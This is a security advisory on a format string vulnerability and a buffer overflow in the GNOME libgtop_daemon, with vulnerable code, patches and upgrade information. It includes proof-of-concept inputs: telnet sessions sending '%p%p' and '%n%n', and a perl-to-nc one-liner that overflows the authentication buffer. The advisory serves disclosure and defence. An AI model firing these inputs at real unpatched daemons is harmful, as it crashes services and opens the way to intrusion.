|
|
|
|
| |
| The Laboratory intexxia found a remote exploitable format string vulnerability in libgtop_daemon that could cause privilege escalation on a remote system. In addition, Flavio Veloso has discovered a buffer overflow in the libgtop_daemon that allows execution of arbitrary code. |
| |
Credit:
The information has been provided by Beno?t Roussel and Flavio Veloso.
|
| |
Vulnerable systems:
libgtop_daemon versions prior to 1.0.12
Immune systems:
libgtop_daemon versions 1.0.13 and up
libgtop_daemon is a GNOME daemon used to monitor process running on a remote system.
Format string:
A remote format string vulnerability exists in this daemon. The 2 functions named syslog_message() and syslog_io_message() are called with a format string which is initialized by the client.
By sending a specially crafted format string to the server, it is possible for a remote attacker to execute arbitrary code on the remote system with the daemon permissions. This vulnerability could cause privilege escalation.
The permitted() function, that verifies if the client trying to connect is authorized to, is concerned by this flaw.
The libgtop_daemon daemon is launched with 'nobody' permissions by default. Complete exploitation of this vulnerability will permit an attacker to execute code with the 'nobody' permissions. However, this flaw could be used to compromise the local system by exploiting other local vulnerabilities.
Exploit:
Here is a proof of concept to show where the problem occurs:
Client side :
~ % telnet 127.0.0.1 42800
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
%p%p
Connection closed by foreign host.
~ % telnet 127.0.0.1 42800
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
%n%n
Connection closed by foreign host.
Server side :
~/# libgtop_daemon -f
' from clientn[3877]: Invalid authentication protocol
'0xbffff46c0x804b2ae
libgtop-daemon[3877]: Refused connection from 127.0.0.1.
Segmentation fault
Patch:
diff -dru libgtop-1.0.12/src/daemon/gnuserv.c
libgtop-1.0.12-patched/src/daemon/gnuserv.c
--- libgtop-1.0.12/src/daemon/gnuserv.c Mon Nov 26 13:48:14 2001
+++ libgtop-1.0.12-patched/src/daemon/gnuserv.c Mon Nov 26 13:49:26 2001
@@ -93,7 +93,7 @@
vsnprintf (buffer, BUFSIZ-1, format, ap);
va_end (ap);
- syslog (priority, buffer);
+ syslog (priority, "%s", buffer);
}
void
@@ -108,7 +108,7 @@
va_end (ap);
snprintf (buffer2, BUFSIZ-1, "%s: %s", buffer, strerror (errno));
- syslog (priority, buffer2);
+ syslog (priority, "%s", buffer2);
}
/*
Buffer overflow:
When Flavio Veloso investigated this issue, he noticed another big security hole in the daemon. It is a buffer overflow in the same permitted() function, which may allow the client to execute code on the server. Here is the code:
permitted (u_long host_addr, int fd)
{
(...)
char buf[1024];
int auth_data_len;
(...)
if (timed_read (fd, buf, 10, AUTH_TIMEOUT, 1) <= 0)
return FALSE;
auth_data_len = atoi (buf);
if (timed_read (fd, buf, auth_data_len, AUTH_TIMEOUT, 0) != auth_data_len)
return FALSE;
Example:
Here you can see the bug in action:
$ perl -e 'print "MAGIC-1\0\0\0\0\0\0\0\0". "2000\0\0\0\0\0\0". ("A"x2000)' | nc localhost 42800
Patch:
diff -Nru libgtop-1.0.13.orig/src/daemon/gnuserv.c libgtop-1.0.13/src/daemon/gnuserv.c
--- libgtop-1.0.13.orig/src/daemon/gnuserv.c Mon Nov 26 20:37:59 2001
+++ libgtop-1.0.13/src/daemon/gnuserv.c Tue Nov 27 09:16:16 2001
@@ -200,6 +200,12 @@
auth_data_len = atoi (buf);
+ if (auth_data_len < 1 || auth_data_len > sizeof(buf)) {
+ syslog_message(LOG_WARNING,
+ "Invalid data length supplied by client");
+ return FALSE;
+ }
+
if (timed_read (fd, buf, auth_data_len, AUTH_TIMEOUT, 0) != auth_data_len)
return FALSE;
Official solution (for both):
libgtop_daemon release 1.0.13 has been made to correct this issue. Here is a link where you can download it :
ftp://ftp.gnome.org/pub/GNOME/stable/sources/libgtop/libgtop-1.0.13.tar.gz
|
|
|
|
|
